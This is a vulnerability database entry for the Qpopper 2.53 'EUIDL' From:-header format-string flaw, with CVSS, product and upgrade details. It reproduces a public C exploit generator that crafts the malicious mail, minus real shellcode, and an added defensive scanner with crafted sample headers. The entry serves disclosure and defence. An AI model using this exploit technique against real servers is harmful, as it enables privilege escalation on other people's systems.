Published: 2000-05-24 00:00:00
Revised: 2008-09-10 15:04:41

[Original] Qpopper 2.53 and earlier allows local users to gain privileges via a formatting string in the From: header, which is processed by the euidl command.

[CNNVD] Qualcomm Qpopper 'EUIDL' Format String Input Vulnerability (CNNVD-200005-084)

        Qpopper 2.53 and earlier versions are vulnerable. A local user can elevate privileges by placing a format string in the header that the euidl command processes.

- CVSS (base score)

CVSS score: 7.5 [HIGH]
Confidentiality impact: PARTIAL [information disclosure is likely]
Integrity impact: PARTIAL [system files may be modified]
Availability impact: PARTIAL [performance may degrade or access to resources may be interrupted]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: [--]
Authentication: NONE [no authentication needed to exploit]

- CPE (affected platforms and products)

cpe:/h:sun:cobalt_raq_3i    Sun Cobalt RaQ 3.0
cpe:/h:sun:cobalt_raq_2     Sun Cobalt RaQ 2.0

- OVAL (technical details for detection)


- Official database links
(official source) MITRE
(official source) NVD
(official source) CNNVD

- Other links and resources
(UNKNOWN)  BID  1242
(UNKNOWN)  SUSE  20000608 pop <= 2000.3.4
(UNKNOWN)  BUGTRAQ  20000523 Qpopper 2.53 remote problem, user can gain gid=mail

- Vulnerability information

Qualcomm Qpopper 'EUIDL' Format String Input Vulnerability
High risk    Input validation
2000-05-24 00:00:00    2006-08-28 00:00:00
        Qpopper 2.53 and earlier versions are vulnerable. A local user can elevate privileges by placing a format string in the header that the euidl command processes.

- Advisories and patches

        Upgrading to version 3.0.1 or later of qpopper is recommended by the vendor.
        Qualcomm qpopper 2.52
        Qualcomm qpopper 2.53

- Vulnerability information (19955)

Cobalt RaQ 2.0/3.0, qpopper 2.52/2.53 'EUIDL' Format String Input Vulnerability (EDBID:19955)
linux local
2000-05-24 Verified
0 Prizm
N/A

A vulnerability exists in version 2.53 and prior of qpopper, a popular POP server, from Qualcomm. By placing machine executable code in the X-UIDL header field, supplying formatting strings in the "From:" field in a mail header, and then issuing, as the user the mail was sent to, a 'euidl' command, it is possible to execute arbitrary code. This code will execute as the user executing the euidl command, but with group 'mail' permissions on hosts running qpopper in that group. This is often done due to mail spool permissions.

This vulnerability does not exist in versions after 2.53. It also requires an account on the machine.

/*  qpop_euidl.c exploit by prizm/Buffer0verflow Security
 *  Sample exploit for buffer overflow in Qpopper 2.53.
 *  This little proggie generates a mail u need to send.
 *  Standard disclaimer applies.
 *  By the way, exploit is broken =) You need to insert shellcode.
 *  MAD greets to tf8 for pointing out the bug, and all other b0f members.
 *  greets to USSRLabs and ADM
 *  check for news.
 */
#include <stdio.h>
#include <string.h>

/* Placeholder only: the author deliberately left the real payload out (see note above). */
char shellcode[]="imnothing";

int main(int argc, char *argv[])
{
        int i;
        unsigned long ra=0;

        if(argc!=2) {
                fprintf(stderr,"Usage: %s return_addr\n", argv[0]);
                return 1;                       /* bail out on bad usage */
        }
        sscanf(argv[1], "%lx", &ra);            /* %lx: ra is an unsigned long */
        if(sizeof(shellcode) < 12 || sizeof(shellcode) > 76) {
                fprintf(stderr,"Bad shellcode\n");
                return 1;                       /* payload must fit the X-UIDL field */
        }
        fprintf(stderr,"return address: 0x%.8lx\n", ra);

        /* X-UIDL header carries the payload bytes verbatim */
        printf("X-UIDL: ");
        for(i=0; i < sizeof(shellcode);i++)
                printf("%c", shellcode[i]);

        /* From: header carries the format directive followed by the address, little-endian, 50 times */
        printf("From: %s", "%.1000d");
        for(i=0; i < 50; i++)
                printf("%c%c%c%c", (ra & 0xff), (ra & 0xff00)>>8, (ra & 0xff0000)>>16, (ra & 0xff000000)>>24);

        printf("Subject: test\r\n\r\nhuh?\r\n.\r\n");
        return 0;
}
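As an added defensive illustration (not Qpopper's code and not part of the original entry), the following scanner flags the two header traits the description above names: printf directives in the From: value and non-printable bytes in the X-UIDL value. `scan_headers`, the `FLAG_*` names and the two sample messages are constructed for this example; the first sample has the shape the exploit above emits.

```c
#include <ctype.h>
#include <string.h>

#define FLAG_FROM_FORMAT 1  /* From: carries a printf directive */
#define FLAG_UIDL_BINARY 2  /* X-UIDL: carries non-printable bytes */

/* Case-insensitive test: does the line begin with this header name? */
static int starts_with_header(const char *line, size_t n, const char *name)
{
    for (size_t i = 0; name[i]; i++)
        if (i >= n || tolower((unsigned char)line[i]) != tolower((unsigned char)name[i])) return 0;
    return 1;
}
/* True if the value holds a '%' directive other than the literal "%%". */
static int has_format_directive(const char *v, size_t n)
{
    for (size_t i = 0; i < n; i++) {
        if (v[i] != '%') continue;
        if (i + 1 < n && v[i + 1] == '%') { i++; continue; }
        return 1;
    }
    return 0;
}
/* True if the value holds bytes outside printable ASCII (tab allowed). */
static int has_binary_bytes(const char *v, size_t n)
{
    for (size_t i = 0; i < n; i++)
        if (((unsigned char)v[i] < 0x20 && v[i] != '\t') || (unsigned char)v[i] >= 0x7f) return 1;
    return 0;
}
/* Walk a header block line by line (CRLF or LF) and OR together the FLAG_* values that apply. */
int scan_headers(const char *hdr, size_t len)
{
    int flags = 0;
    for (size_t pos = 0; pos < len;) {
        const char *line = hdr + pos, *nl = memchr(line, '\n', len - pos);
        size_t ll = nl ? (size_t)(nl - line) : len - pos, body = ll;
        if (body && line[body - 1] == '\r') body--;            /* strip the CR of CRLF */
        if (starts_with_header(line, body, "From:") && has_format_directive(line + 5, body - 5))
            flags |= FLAG_FROM_FORMAT;
        if (starts_with_header(line, body, "X-UIDL:") && has_binary_bytes(line + 7, body - 7))
            flags |= FLAG_UIDL_BINARY;
        pos += ll + (nl ? 1 : 0);
    }
    return flags;
}
/* Constructed samples (not real mail): the first mirrors what the generator above prints. */
static const char sample_bad[] = "X-UIDL: \x90\x90\xcc\xcc\r\nFrom: %.1000d\x10\x84\x04\x08\r\nSubject: test\r\n";
static const char sample_ok[] = "X-UIDL: 3a8f2c\r\nFrom: alice@example.org (100%% human)\r\nSubject: hi\r\n";
```

A server or mail filter can run this at the boundary where headers are parsed and log or reject a message that sets either flag; a literal "%%" in a display name is not flagged.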

- Vulnerability information

Qpopper From: Header Format String Local Privilege Escalation
Local Access Required Input Manipulation
Loss of Integrity Upgrade
Exploit Public Third-party Verified

- Vulnerability description

- Timeline

2000-05-22 Unknown
Unknown Unknown

- Solution

Upgrade to version 3.0.2 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- References

- Vulnerability author

Unknown or Incomplete